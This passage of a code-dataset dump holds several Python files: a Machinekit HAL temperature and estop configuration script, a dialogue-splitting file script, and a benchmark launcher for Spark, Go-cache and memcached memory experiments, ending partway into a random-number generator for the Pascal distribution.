hal.loadusr(\"hal_tclab\",name=\"hal_tclab\",wait_name=\"hal_tclab\",wait_timeout=30)\n hal.Pin(\"hal_tclab.enable\").link(hal.Signal(\"ALLenable\"))\n\n\n\ndef create_temperature_control(name, section, thread, hardwareOkSignal=None,\n coolingFan=None, hotendFan=None, tclab_index=0):\n\n tempSet = hal.newsig('%s-temp-set' % name, hal.HAL_FLOAT)\n tempMeas = hal.newsig('%s-temp-meas' % name, hal.HAL_FLOAT)\n tempInRange = hal.newsig('%s-temp-in-range' % name, hal.HAL_BIT)\n tempInRangePre = hal.newsig('%s-temp-in-range-pre-check' % name, hal.HAL_BIT)\n active = hal.newsig('%s-active' % name, hal.HAL_BIT)\n tempLimitMin = hal.newsig('%s-temp-limit-min' % name, hal.HAL_FLOAT)\n tempLimitMax = hal.newsig('%s-temp-limit-max' % name, hal.HAL_FLOAT)\n\n hal.Pin(\"hal_tclab.temperature-%s\"%str(tclab_index)).link(tempMeas)\n hal.Pin(\"hal_tclab.setpoint-%s\"%str(tclab_index)).link(tempSet)\n hal.Pin(\"hal_tclab.enable-%s\"%str(tclab_index)).link(active)\n active.set(1)\n tempInLimit = hal.newsig('%s-temp-in-limit' % name, hal.HAL_BIT)\n tempThermOk = hal.newsig('%s-temp-therm-ok' % name, hal.HAL_BIT)\n error = hal.newsig('%s-error' % name, hal.HAL_BIT)\n\n\n\n tempPidPgain = hal.newsig('%s-temp-pid-Pgain' % name, hal.HAL_FLOAT)\n tempPidIgain = hal.newsig('%s-temp-pid-Igain' % name, hal.HAL_FLOAT)\n tempPidDgain = hal.newsig('%s-temp-pid-Dgain' % name, hal.HAL_FLOAT)\n tempPidMaxerrorI = hal.newsig('%s-temp-pid-maxerrorI' % name, hal.HAL_FLOAT)\n tempPidOut = hal.newsig('%s-temp-pid-out' % name, hal.HAL_FLOAT)\n tempPidBias = hal.newsig('%s-temp-pid-bias' % name, hal.HAL_FLOAT)\n tempRangeMin = hal.newsig('%s-temp-range-min' % name, hal.HAL_FLOAT)\n tempRangeMax = hal.newsig('%s-temp-range-max' % name, hal.HAL_FLOAT)\n noErrorIn = hal.newsig('%s-no-error-in' % name, hal.HAL_BIT)\n errorIn = hal.newsig('%s-error-in' % name, hal.HAL_BIT)\n\n sum2 = rt.newinst('sum2', 'sum2.%s-temp-range-pos' % name)\n hal.addf(sum2.name, thread)\n sum2.pin('in0').link(tempSet)\n sum2.pin('in1').set(c.find(section, 'TEMP_RANGE_POS_ERROR'))\n sum2.pin('out').link(tempRangeMax)\n\n\n\n sum2 = rt.newinst('sum2', 'sum2.%s-temp-range-neg' % name)\n hal.addf(sum2.name, thread)\n sum2.pin('in0').link(tempSet)\n sum2.pin('in1').set(c.find(section, 'TEMP_RANGE_NEG_ERROR'))\n sum2.pin('out').link(tempRangeMin)\n\n #the output of this component will say if measured temperature is in range of set value\n wcomp = rt.newinst('wcomp', 'wcomp.%s-temp-in-range' % name)\n hal.addf(wcomp.name, thread)\n 
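# wcomp drives its output true while min < in < max; here that flags the measured\n # temperature as sitting inside the tolerance window built around the setpoint\n 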
wcomp.pin('min').link(tempRangeMin)\n wcomp.pin('max').link(tempRangeMax)\n wcomp.pin('in').link(tempMeas)\n wcomp.pin('out').link(tempInRangePre)\n\n\n\n notActive = hal.newsig('%s-not-active' % name, hal.HAL_BIT)\n activeNot = rt.newinst('not','not.%s.active-not'%name)\n hal.addf(activeNot.name, thread)\n activeNot.pin('in').link(active)\n activeNot.pin('out').link(notActive)\n\n\n or2 = rt.newinst('orn', 'or2.%s-check-temp-in-range'%name, pincount='2')\n hal.addf(or2.name, thread)\n or2.pin('in1').link(tempInRangePre)\n\n or2.pin('in0').link(notActive)\n or2.pin('out').link(tempInRange)\n\n\n\n # limit the output temperature to prevent damage when thermistor is broken/removed\n wcomp = rt.newinst('wcomp', 'wcomp.%s-temp-in-limit' % name)\n hal.addf(wcomp.name, thread)\n wcomp.pin('min').link(tempLimitMin)\n wcomp.pin('max').link(tempLimitMax)\n wcomp.pin('in').link(tempMeas)\n wcomp.pin('out').link(tempInLimit)\n\n rcomps.create_temperature_rcomp(name)\n motion.setup_temperature_io(name)\n tempLimitMax.set(c.find(section,\"TEMP_LIMIT_MAX\"))\n print(\"max set to\",c.find(section,\"TEMP_LIMIT_MAX\"))\n tempLimitMin.set(c.find(section,\"TEMP_LIMIT_MIN\"))\n\ndef setup_estop(errorSignals, thread):\n # Create estop signal chain\n estopTest = hal.Signal('estop-test', hal.HAL_BIT)\n estopUser = hal.Signal('estop-user', hal.HAL_BIT)\n estopReset = hal.Signal('estop-reset', hal.HAL_BIT)\n estopOut = hal.Signal('estop-out', hal.HAL_BIT)\n estopIn = hal.Signal('estop-in', hal.HAL_BIT)\n estopError = hal.Signal('estop-error', hal.HAL_BIT)\n\n #num = len(errorSignals)\n #orComp = rt.newinst('orn', 'or%i.estop-error' % num, pincount=num)\n #hal.addf(orComp.name, thread)\n #for n, sig in enumerate(errorSignals):\n # orComp.pin('in%i' % n).link(sig)\n #orComp.pin('out').link(estopError)\n estopError.set(0)\n estopLatch = rt.newinst('estop_latch', 'estop-latch')\n hal.addf(estopLatch.name, thread)\n estopLatch.pin('ok-in').link(estopUser)\n estopLatch.pin('fault-in').link(estopError)\n estopLatch.pin('reset').link(estopReset)\n estopLatch.pin('ok-out').link(estopOut)\n\n\n estopReset.link('iocontrol.0.user-request-enable')\n estopUser.link('iocontrol.0.user-enable-out')\n\n\n # Monitor estop input from hardware\n estopIn.link('iocontrol.0.emc-enable-in')\n# hal.net('iocontrol.0.user-enable-out', 'iocontrol.0.emc-enable-in')\n\ndef setup_estop_loopback():\n # create signal for estop loopback\n hal.net('iocontrol.0.user-enable-out', 'iocontrol.0.emc-enable-in')\n\ndef setup_tool_loopback():\n hal.net('iocontrol.0.tool-prepare', 'iocontrol.0.tool-prepared')\n hal.net('iocontrol.0.tool-change', 'iocontrol.0.tool-changed')\n\ndef setup_delta():\n assign_param(\"lineardeltakins\",\"R\",\"295.4\")\n assign_param(\"lineardeltakins\",\"L\",\"654\")\n","sub_path":"fdm/config/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":10860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"216629834","text":"f=open('E:\\\\test.txt')\r\n\r\nsingle = []\r\ndouble = []\r\ncount = 1\r\nfor each_line in f:\r\n if each_line[:6] != '======':\r\n (role,line_spoken) = each_line.split('.',1)\r\n int(role)\r\n if role == '1':\r\n single.append(line_spoken)\r\n elif role =='2':\r\n double.append(line_spoken)\r\n else:\r\n file_name_single = 'single_' + str(count) + '.txt'\r\n file_name_double = 'double_' + str(count) + '.txt'\r\n\r\n single_file = open(file_name_single,'w')\r\n double_file = open(file_name_double,'w')\r\n\r\n single_file.writelines(single)\r\n 
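# speaker 2's buffered lines are flushed to the matching double_N.txt in the same way\r\n 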
double_file.writelines(double)\r\n\r\n single_file.close()\r\n double_file.close()\r\n\r\n single = []\r\n double = []\r\n count += 1\r\n\r\nf.close()\r\n\r\n \r\n","sub_path":"temp/file tidying.py","file_name":"file tidying.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"168402477","text":"#!/usr/bin/env python3\n\nfrom apps import *\nfrom tests import *\nimport sys\nfrom typing import Dict, Tuple, Union, cast\nimport copy\n\njava_home = \"/home/eurosys21/jvms/java_home\"\nhibench_home = \"/home/eurosys21/applications/HiBench\"\nspark_home = \"/home/eurosys21/applications/spark-2.3.2-bin-hadoop2.7\"\ndetc_home = \"/home/eurosys21/applications/detc\"\nmemcached_home = \"/home/eurosys21/applications/memcached-1.6.7\"\nbakers = set([ \"baker\" + str(i) for i in range(10, 17 + 1) ])\n\ndef minutes(m: int) -> int:\n\treturn m * 60\n\ndef _jvm_conf(heap_size: str, sigve: bool = False, jvm_args: List[str] = None) -> jvm_conf:\n\targs = [ \"-XX:+UseG1GC\", \"-XX:+UseSIGVEPidFile\" ]\n\targs.append(\"-XX:+PrintGCApplicationStoppedTime\")\n\tif sigve:\n\t\targs.append(\"-XX:+UseSIGVE\")\n\t\targs.append(\"-XX:+ExplicitGCInvokesConcurrent\")\n\t\targs.append(\"-XX:SIGVECost=25\")\n\tif jvm_args:\n\t\targs.extend(jvm_args)\n\treturn jvm_conf(java_home, args = args).heap(heap_size)\n\nclass spark_params:\n\tdef __init__(self, heap_size: int, workload: str = \"ml/kmeans\", scale: str = None,\n\t\t\tmem_frac: float = -1, mem_storage_frac: float = -1,\n\t\t\tsigve: bool = False, sigve_n: int = -1, sigve_f: float = -1) -> None:\n\t\tself.heap_size: int = heap_size\n\t\tself.mem_frac: float = mem_frac\n\t\tself.mem_storage_frac: float = mem_storage_frac\n\t\tself.workload: str = workload\n\t\tself.scale: str = scale\n\t\tif scale == None:\n\t\t\tif self.workload == \"ml/kmeans\":\n\t\t\t\tself.scale = \"gigantic\"\n\t\t\telif self.workload == \"websearch/pagerank\":\n\t\t\t\t#self.scale = \"hugeplus\"\n\t\t\t\tself.scale = \"hugeplusplus\"\n\t\t\telif self.workload == \"graph/nweight\":\n\t\t\t\t#self.scale = \"largeplus\"\n\t\t\t\tself.scale = \"largeplus_p120_\"\n\t\t\telse:\n\t\t\t\tprint(\"[error] bogus workload: \" + self.workload)\n\t\t\t\tassert(False)\n\t\tself.sigve: bool = sigve\n\t\tself.sigve_n: int = sigve_n\n\t\tself.sigve_f: float = sigve_f\n\nclass detc_params:\n\tdef __init__(self, size: int, wounds: int = 5, clients: int = 5,\n\t\t\trequests: int = 13 * 100 * 1000, keys: int = 12 * 1000 * 1000,\n\t\t\tcores: int = 5, gc: int = 100, port: int = 32232,\n\t\t\tlow_shrink: int = 0, high_shrink: int = 6) -> None:\n\t\tself.size: int = size\n\t\tself.wounds: int = wounds\n\t\tself.clients: int = clients\n\t\tself.requests: int = requests\n\t\tself.keys: int = keys\n\t\tself.cores: int = cores\n\t\tself.gc: int = gc\n\t\tself.port: int = port\n\t\tself.low_shrink: int = low_shrink\n\t\tself.high_shrink: int = high_shrink\n\nclass memcached_params:\n\tdef __init__(self, size: int, requests: int = 13 * 100 * 1000, keys: int = 12 * 1000 * 1000,\n\t\t\tport: int = 32232) -> None:\n\t\tself.size: int = size\n\t\tself.requests: int = requests\n\t\tself.keys: int = keys\n\t\tself.port: int = port\n\t\tself.sigve: bool = False\n\ndef init_spark_old(conf: config, sps: List[spark_params], jvm_args: List[str] = None) -> List[jvm_conf]:\n\tcount: Dict[str, int] = {}\n\tjvms: List[jvm_conf] = []\n\tfor sp in sps:\n\t\tif sp.workload not in count:\n\t\t\tcount[sp.workload] = 0\n\t\tsp.scale += 
str(count[sp.workload])\n\t\tcount[sp.workload] += 1\n\n\t\tif conf == config.sigve:\n\t\t\tjvm = _jvm_conf(\"64G\", True, jvm_args)\n\t\telse:\n\t\t\tjvm = _jvm_conf(str(sp.heap_size) + \"G\", False)\n\t\tjvms.append(jvm)\n\treturn jvms\n\ndef init_spark(conf: config, sp: spark_params, jvm_args: List[str] = None) -> jvm_conf:\n\tif conf == config.sigve:\n\t\tjvm = _jvm_conf(str(sp.heap_size) + \"G\", True, jvm_args)\n\telse:\n\t\tjvm = _jvm_conf(str(sp.heap_size) + \"G\", False)\n\treturn jvm\n\ndef init_detc(conf: config, dp: detc_params) -> go_conf:\n\t_go_conf: Dict[str, str] = {\n\t\t\"GOMAXPROCS\": str(5),\n\t}\n\tif conf == config.sigve:\n\t\tgo = go_conf(_go_conf)\n\t\tgo.sigve()\n\telse:\n\t\tif conf != config.pure_default:\n\t\t\t_go_conf[\"GOGC\"] = str(dp.gc)\n\t\tgo = go_conf(_go_conf)\n\treturn go\n\ndef init_global(conf: config, cgroup_mem: str = \"64g\") -> Tuple[cgroup, sigve_conf]:\n\tcg = cgroup(bakers, \"memory:thermostat\", cgroup_mem)\n\tsc: sigve_conf = None\n\tif conf == config.sigve:\n\t\tif cgroup_mem == \"64g\":\n\t\t\tsc = sigve_conf(java_home)\n\t\telse:\n\t\t\tsc = sigve_conf(java_home,\n\t\t\t\ttop = str(7 * 1024 + 512) + \"m\",\n\t\t\t\tlow_wm_init = str(6 * 1024 + 512) + \"m\",\n\t\t\t\thigh_wm_init = \"7g\")\n\treturn cg, sc\n\ndef init_params(conf: config, params: List[Union[spark_params, detc_params, memcached_params]]) -> List[Union[jvm_conf, go_conf]]:\n\truntimes: List[Union[jvm_conf, go_conf]] = []\n\tspark_count: Dict[str, int] = {}\n\tport_count: int = 0\n\tfor param in params:\n\t\tif isinstance(param, spark_params):\n\t\t\tif param.workload not in spark_count:\n\t\t\t\tspark_count[param.workload] = 0\n\t\t\tparam.scale += str(spark_count[param.workload])\n\t\t\tspark_count[param.workload] += 1\n\t\t\truntimes.append(init_spark(conf, param))\n\t\telif isinstance(param, detc_params):\n\t\t\tparam.port += port_count\n\t\t\tport_count += 1\n\t\t\truntimes.append(init_detc(conf, param))\n\t\telif isinstance(param, memcached_params):\n\t\t\tparam.port += port_count\n\t\t\tport_count += 1\n\t\t\tif conf == config.sigve:\n\t\t\t\tparam.sigve = True\n\t\t\truntimes.append(None)\n\t\telse:\n\t\t\tprint(\"[error] init_param invalid param type... 
{}\".format(param))\n\t\t\tsys.exit(1)\n\treturn runtimes\n\ndef workload_n(conf: config, params: List[Union[spark_params, detc_params, memcached_params]], delay: int = 0, path: str = None, cgroup_mem: str = \"64g\") -> None:\n\tcg, sc = init_global(conf, cgroup_mem)\n\tif sc != None and path != None and \"hightop\" in path:\n\t\tsc.top = 64 * 1024 * 1024 * 1024\n\tif sc != None and path != None and \"nokill\" in path:\n\t\tsc.kill_time = 3 * 3600 * 1000\n\tif sc != None and path != None and \"static\" in path:\n\t\tsc.wm_increment_percent = 0\n\t\tsc.low_wm_init = 40 * 1024 * 1024 * 1024\n\t\tsc.high_wm_init = 45 * 1024 * 1024 * 1024\n\tif sc != None and path != None and \"dynamic\" in path:\n\t\tsc.low_wm_init = 40 * 1024 * 1024 * 1024\n\t\tsc.high_wm_init = 45 * 1024 * 1024 * 1024\n\truntimes = init_params(conf, params)\n\n\tapps: List[application] = []\n\tfor param, runtime in zip(params, runtimes):\n\t\tif isinstance(param, spark_params):\n\t\t\tif path != None and \"util-smolbrain\" in path and len(apps) == 2:\n\t\t\t\tapps.append(hibench_spark(bakers, hibench_home, spark_home, cast(jvm_conf, runtime),\n\t\t\t\t\tscale = param.scale, workload = param.workload,\n\t\t\t\t\tmax_cores = 5 * 8, cores = 5,\n\t\t\t\t\tmem_frac = param.mem_frac, mem_storage_frac = param.mem_storage_frac,\n\t\t\t\t\tcg = None))\n\t\t\telse:\n\t\t\t\tif cgroup_mem == \"64g\":\n\t\t\t\t\tmax_cores = 5 * 8\n\t\t\t\t\tcores = 5\n\t\t\t\telse:\n\t\t\t\t\tmax_cores = 8\n\t\t\t\t\tcores = 8\n\t\t\t\tapps.append(hibench_spark(bakers, hibench_home, spark_home, cast(jvm_conf, runtime),\n\t\t\t\t\tscale = param.scale, workload = param.workload,\n\t\t\t\t\tmax_cores = max_cores, cores = cores,\n\t\t\t\t\tmem_frac = param.mem_frac, mem_storage_frac = param.mem_storage_frac,\n\t\t\t\t\tsigve = param.sigve, sigve_n = param.sigve_n, sigve_f = param.sigve_f,\n\t\t\t\t\tcg = cg))\n\t\telif isinstance(param, detc_params):\n\t\t\tapps.append(detc(bakers, detc_home, cast(go_conf, runtime), param.size, param.wounds, param.low_shrink, param.high_shrink, param.port, cg))\n\t\telif isinstance(param, memcached_params):\n\t\t\tapps.append(memcached(bakers, memcached_home, param.size, param.port, param.sigve, cg))\n\t\telse:\n\t\t\tprint(\"[error] workload_n apps invalid param type... {}\".format(param))\n\t\t\tsys.exit(1)\n\n\tstresses: List[benchmark] = []\n\tfor i, app_param in enumerate(zip(apps, params)):\n\t\tapp, param = app_param\n\t\tif isinstance(app, hibench_spark):\n\t\t\tstresses.append(hibench_stress(bakers, cast(hibench_spark, app), 0 if i == 0 else delay))\n\t\telif isinstance(app, detc):\n\t\t\tdp = cast(detc_params, param)\n\t\t\tstresses.append(detc_stress(bakers, cast(detc, app), 0 if i == 0 else delay, dp.clients, dp.requests, dp.keys, dp.cores, dp.port))\n\t\telif isinstance(app, memcached):\n\t\t\tmcp = cast(memcached_params, param)\n\t\t\tstresses.append(memcached_stress(bakers, cast(memcached, app), 0 if i == 0 else delay, mcp.requests, mcp.keys, mcp.port))\n\t\telse:\n\t\t\tprint(\"[error] workload_n stresses invalid param type... 
{}\".format(param))\n\t\t\tsys.exit(1)\n\n\ttest_runner.run_1time(path if path else sys.argv[1], conf, stresses, _sigve_conf = sc)\n\ndef run_global_optimal(prefix: str, count: int = 1) -> None:\n\tnw = lambda: spark_params(24, \"graph/nweight\", mem_frac = 0.5, mem_storage_frac = 0.9)\n\tdetc = lambda: detc_params(10, gc = 5)\n\tkm = lambda: spark_params(14, \"ml/kmeans\", mem_frac = 0.7, mem_storage_frac = 0.9)\n\tpr = lambda: spark_params(14, \"websearch/pagerank\", mem_frac = 0.7, mem_storage_frac = 0.9)\n\n\tfor i in range(count):\n\t\t##WW0\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ nw(), nw() ],\n\t\t\t0, prefix + \"-globaloptimal-WW0\")\n\t\t##CCC0\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ detc(), detc(), detc() ],\n\t\t\t0, prefix + \"-globaloptimal-CCC0\")\n\t\t##PPP0\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ pr(), pr(), pr() ],\n\t\t\t0, prefix + \"-globaloptimal-PPP0\")\n\t\t##MMM0\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ km(), km(), km() ],\n\t\t\t0, prefix + \"-globaloptimal-MMM0\")\n\n\t\t##MMM180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ km(), km(), km() ],\n\t\t\t180, prefix + \"-globaloptimal-MMM180\")\n\t\t##MMW180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ km(), km(), nw() ],\n\t\t\t180, prefix + \"-globaloptimal-MMW180\")\n\t\t##WMM300\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ nw(), km(), km() ],\n\t\t\t300, prefix + \"-globaloptimal-WMM300\")\n\t\t##MCM180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ km(), detc(), km() ],\n\t\t\t180, prefix + \"-globaloptimal-MCM180\")\n\t\t##CPW180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ detc(), pr(), nw() ],\n\t\t\t180, prefix + \"-globaloptimal-CPW180\")\n\t\t##WPM180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ nw(), pr(), km() ],\n\t\t\t180, prefix + \"-globaloptimal-WPM180\")\n\t\t##CWM180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ detc(), nw(), km() ],\n\t\t\t180, prefix + \"-globaloptimal-CWM180\")\n\t\t##CMW180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ detc(), km(), nw() ],\n\t\t\t180, prefix + \"-globaloptimal-CMW180\")\n\t\t##WMP240\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ nw(), km(), pr() ],\n\t\t\t240, prefix + \"-globaloptimal-WMP240\")\n\t\t##CCC480\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ detc(), detc(), detc() ],\n\t\t\t480, prefix + \"-globaloptimal-CCC480\")\n\t\t##CCW300\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ detc(), detc(), nw() ],\n\t\t\t300, prefix + \"-globaloptimal-CCW300\")\n\t\t##MWP180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ km(), nw(), pr() ],\n\t\t\t180, prefix + \"-globaloptimal-MWP180\")\n\ndef run_default(prefix: str, count: int = 1) -> None:\n\tnw = lambda: spark_params(16, \"graph/nweight\")\n\tdetc = lambda: detc_params(10)\n\tkm = lambda: spark_params(16, \"ml/kmeans\")\n\tpr = lambda: spark_params(16, \"websearch/pagerank\")\n\n\tfor i in range(count):\n\t\t##PPP0\n\t\tworkload_n(config.pure_default,\n\t\t\t\t[ pr(), pr(), pr() ],\n\t\t\t\t0, prefix + \"-default-PPP0\")\n\t\t##MMM0\n\t\tworkload_n(config.pure_default,\n\t\t\t\t[ km(), km(), km() ],\n\t\t\t\t0, prefix + \"-default-MMM0\")\n\t\t##CCC0\n\t\tworkload_n(config.pure_default,\n\t\t\t\t[ detc(), detc(), detc() ],\n\t\t\t\t0, prefix + \"-default-CCC0\")\n\n\t\t##MMM180\n\t\tworkload_n(config.pure_default,\n\t\t\t\t[ km(), km(), km() ],\n\t\t\t\t180, prefix + \"-default-MMM180\")\n\t\t##MCM180\n\t\tworkload_n(config.pure_default,\n\t\t\t\t[ km(), detc(), km() ],\n\t\t\t\t180, prefix + 
\"-default-MCM180\")\n\t\t##CCC480\n\t\tworkload_n(config.pure_default,\n\t\t\t\t[ detc(), detc(), detc() ],\n\t\t\t\t480, prefix + \"-default-CCC480\")\n\ndef run_oracle(conf: config, prefix: str, count: int = 1) -> None:\n\tdetc = lambda x: detc_params(x, gc = 5)\n\tif conf == config.big_brain:\n\t\tkm = lambda x: spark_params(x, \"ml/kmeans\", mem_frac = 0.7, mem_storage_frac = 0.9)\n\t\tnw = lambda x: spark_params(x, \"graph/nweight\", mem_frac = 0.5, mem_storage_frac = 0.9)\n\t\tpr = lambda x: spark_params(x, \"websearch/pagerank\", mem_frac = 0.7, mem_storage_frac = 0.9)\n\t\tpath = \"oracle-spark\"\n\telse:\n\t\tkm = lambda x: spark_params(x, \"ml/kmeans\")\n\t\tnw = lambda x: spark_params(x, \"graph/nweight\")\n\t\tpr = lambda x: spark_params(x, \"websearch/pagerank\")\n\t\tpath = \"oracle\"\n\n\tfor i in range(count):\n\t\t##WW0\n\t\tworkload_n(conf,\n\t\t\t[ nw(27), nw(27) ],\n\t\t\t0, prefix + \"-\" + path + \"-WW0\")\n\t\t##CCC0\n\t\tworkload_n(conf,\n\t\t\t[ detc(16), detc(16), detc(16) ],\n\t\t\t0, prefix + \"-\" + path + \"-CCC0\")\n\t\t##PPP0\n\t\tworkload_n(conf,\n\t\t\t[ pr(18), pr(18), pr(18) ],\n\t\t\t0, prefix + \"-\" + path + \"-PPP0\")\n\t\t##MMM0\n\t\tworkload_n(conf,\n\t\t\t[ km(18), km(18), km(18) ],\n\t\t\t0, prefix + \"-\" + path + \"-MMM0\")\n\n\t\t##MMM180\n\t\tworkload_n(conf,\n\t\t\t[ km(18), km(18), km(18) ],\n\t\t\t180, prefix + \"-\" + path + \"-MMM180\")\n\t\t##MMW180\n\t\tworkload_n(conf,\n\t\t\t[ km(16), km(16), nw(24) ],\n\t\t\t180, prefix + \"-\" + path + \"-MMW180\")\n\t\t##WMM300\n\t\tworkload_n(conf,\n\t\t\t[ nw(24), km(16), km(16) ],\n\t\t\t300, prefix + \"-\" + path + \"-WMM300\")\n\t\t##MCM180\n\t\tworkload_n(conf,\n\t\t\t[ km(20), detc(13), km(20) ],\n\t\t\t180, prefix + \"-\" + path + \"-MCM180\")\n\t\t##CPW180\n\t\tworkload_n(conf,\n\t\t\t[ detc(13), pr(16), nw(24) ],\n\t\t\t180, prefix + \"-\" + path + \"-CPW180\")\n\t\t##WPM180\n\t\tworkload_n(conf,\n\t\t\t[ nw(24), pr(16), km(14) ],\n\t\t\t180, prefix + \"-\" + path + \"-WPM180\")\n\t\t##CWM180\n\t\tworkload_n(conf,\n\t\t\t[ detc(11), nw(24), km(17) ],\n\t\t\t180, prefix + \"-\" + path + \"-CWM180\")\n\t\t##CMW180\n\t\tworkload_n(conf,\n\t\t\t[ detc(11), km(18), nw(24) ],\n\t\t\t180, prefix + \"-\" + path + \"-CMW180\")\n\t\t##WMMP240\n\t\tworkload_n(conf,\n\t\t\t[ nw(24), km(14), pr(16) ],\n\t\t\t240, prefix + \"-\" + path + \"-WMP240\")\n\t\t##CCC480\n\t\tworkload_n(conf,\n\t\t\t[ detc(16), detc(16), detc(16) ],\n\t\t\t480, prefix + \"-\" + path + \"-CCC480\")\n\t\t##CCW300\n\t\tworkload_n(conf,\n\t\t\t[ detc(14), detc(14), nw(24) ],\n\t\t\t300, prefix + \"-\" + path + \"-CCW300\")\n\t\t##MWP180\n\t\tworkload_n(conf,\n\t\t\t[ km(14), nw(24), pr(16) ],\n\t\t\t180, prefix + \"-\" + path + \"-MWP180\")\n\ndef run_m3(prefix: str, count: int = 1) -> None:\n\tnw = lambda: spark_params(64, \"graph/nweight\")\n\tdetc = lambda: detc_params(64)\n\tkm = lambda: spark_params(64, \"ml/kmeans\")\n\tpr = lambda: spark_params(64, \"websearch/pagerank\")\n\n\tfor i in range(count):\n\t\t##WW0\n\t\tworkload_n(config.sigve,\n\t\t\t[ nw(), nw() ],\n\t\t\t0, prefix + \"-m3-WW0\")\n\t\t##CCC0\n\t\tworkload_n(config.sigve,\n\t\t\t[ detc(), detc(), detc() ],\n\t\t\t0, prefix + \"-m3-CCC0\")\n\t\t##PPP0\n\t\tworkload_n(config.sigve,\n\t\t\t[ pr(), pr(), pr() ],\n\t\t\t0, prefix + \"-m3-PPP0\")\n\t\t##MMM0\n\t\tworkload_n(config.sigve,\n\t\t\t[ km(), km(), km() ],\n\t\t\t0, prefix + \"-m3-MMM0\")\n\n\t\t##MMM180\n\t\tworkload_n(config.sigve,\n\t\t\t[ km(), km(), km() ],\n\t\t\t180, prefix + 
\"-m3-MMM180\")\n\t\t##MMW180\n\t\tworkload_n(config.sigve,\n\t\t\t[ km(), km(), nw() ],\n\t\t\t180, prefix + \"-m3-MMW180\")\n\t\t##WMM300\n\t\tworkload_n(config.sigve,\n\t\t\t[ nw(), km(), km() ],\n\t\t\t300, prefix + \"-m3-WMM300\")\n\t\t##MCM180\n\t\tworkload_n(config.sigve,\n\t\t\t[ km(), detc(), km() ],\n\t\t\t180, prefix + \"-m3-MCM180\")\n\t\t##CPW180\n\t\tworkload_n(config.sigve,\n\t\t\t[ detc(), pr(), nw() ],\n\t\t\t180, prefix + \"-m3-CPW180\")\n\t\t##WPM180\n\t\tworkload_n(config.sigve,\n\t\t\t[ nw(), pr(), km() ],\n\t\t\t180, prefix + \"-m3-WPM180\")\n\t\t##CWM180\n\t\tworkload_n(config.sigve,\n\t\t\t[ detc(), nw(), km() ],\n\t\t\t180, prefix + \"-m3-CWM180\")\n\t\t##CMW180\n\t\tworkload_n(config.sigve,\n\t\t\t[ detc(), km(), nw() ],\n\t\t\t180, prefix + \"-m3-CMW180\")\n\t\t##WMP240\n\t\tworkload_n(config.sigve,\n\t\t\t[ nw(), km(), pr() ],\n\t\t\t240, prefix + \"-m3-WMP240\")\n\t\t##CCC480\n\t\tworkload_n(config.sigve,\n\t\t\t[ detc(), detc(), detc() ],\n\t\t\t480, prefix + \"-m3-CCC480\")\n\t\t##CCW300\n\t\tworkload_n(config.sigve,\n\t\t\t[ detc(), detc(), nw() ],\n\t\t\t300, prefix + \"-m3-CCW300\")\n\t\t##MWP180\n\t\tworkload_n(config.sigve,\n\t\t\t[ km(), nw(), pr() ],\n\t\t\t180, prefix + \"-m3-MWP180\")\n\ndef memcached_workload(prefix: str, count: int = 1) -> None:\n\tglobal bakers\n\tbakers = set([ \"baker10\" ])\n\n\tkm = lambda x, y: spark_params(x, \"ml/kmeans\", \"large\", sigve = y)\n\n\tfor i in range(count):\n\t\tworkload_n(config.smol_brain,\n\t\t\t[ km(4, False), memcached_params(4) ],\n\t\t\t240, prefix + \"-memecached-vanilla\", \"8g\")\n\n\t\tworkload_n(config.sigve,\n\t\t\t[ km(8, True), memcached_params(8) ],\n\t\t\t240, prefix + \"-memecached-m3\", \"8g\")\n\ndef main() -> None:\n\t# Each of these functions will run a set of workloads with a certain configuration.\n\t# The string argument (\"artifact\") is a prefix for the directory the tests will be saved in.\n\t# The integer argument (1) is the number of runs to perform.\n\t# As is, this will run all benchmarks for the main results (Figure 5 and 8) once.\n\trun_default(\"artifact\", 1)\n\n\trun_m3(\"artifact\", 1)\n\trun_oracle(config.big_brain, \"artifact\", 1) # oracle with spark conf\n\trun_oracle(config.smol_brain, \"artifact\", 1) # oracle without spark conf\n\trun_global_optimal(\"artifact\", 1)\n\trun_default(\"artifact\", 1)\n\n\t# In order to run this the Spark cluster must be restarted with only one worker.\n\t# Comment all workers except \"baker10\" in \"~/applications/spark-2.3.2-bin-hadoop2.7/conf/slaves\"\n\t#memcached_workload(\"artifact\", 1)\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"launch.py","file_name":"launch.py","file_ext":"py","file_size_in_byte":16241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"55519812","text":"import numpy as np \r\nfrom math import log, exp, factorial\r\nfrom matplotlib import pyplot as plt\r\nfrom generator import nro_random\r\nfrom graph_decoration import *\r\n\r\ndef pascal(k, p): \r\n x = 0\r\n producto = 1\r\n for i in range(k):\r\n r = nro_random() # Genera nro pseudoaleatorio\r\n producto *= r\r\n x = log(producto) / log(1 - p) # T.Inv indirecta\r\n return int(x) # Redondeo al entero mas proximo\r\n\r\ndef generate_pascal(k, p, n):\r\n corrida = []\r\n for i in range(n): \r\n x = pascal(k, p) # Genero nro con dist. de Pascal\r\n corrida.append( x ) # Secuencia de nros con dist. 
